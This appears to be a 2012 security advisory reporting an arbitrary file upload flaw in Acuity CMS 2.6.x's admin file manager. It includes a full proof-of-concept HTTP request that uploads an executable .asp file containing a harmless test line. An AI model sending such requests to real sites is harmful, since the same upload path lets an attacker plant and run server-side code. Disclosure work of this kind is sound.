Acuity CMS 2.6.x (ASP-based) Arbitrary File Upload

Credit: Aung Khant
Risk: High
Local: No
Remote: Yes

1. OVERVIEW Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION Acuity CMS 2.6.x (ASP-based) version contain a flaw that may allow an attacker to upload .asp/.aspx files without restrictions, which will execute ASP(.Net) codes. The issue is due to the script, /admin/file_manager/file_upload_submit.asp , not properly sanitizing 'file1', 'file2', 'file3', 'fileX' parameters. 4. VERSIONS AFFECTED Tested with version 2.6.2. 5. PROOF-OF-CONCEPT/EXPLOIT [REQUEST] POST /admin/file_manager/file_upload_submit.asp HTTP/1.1 Host: localhost Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="path" /images -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="rootpath" / -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="rootdisplay" http://localhost/ -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="status" confirmed -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="action" fileUpload -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="file1"; filename="0wned.asp" Content-Type: application/octet-stream <% response.write("0wned!") %> -----------------------------6dc3a236402e2-- [/REQUEST] 6. SOLUTION The Acunity CMS is no longer in active development. It is recommended to user another CMS in active development and support. 7. VENDOR The Collective 8. CREDIT Aung Khant,, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-05-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: #yehg [2012-05-20]


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020,


Back to Top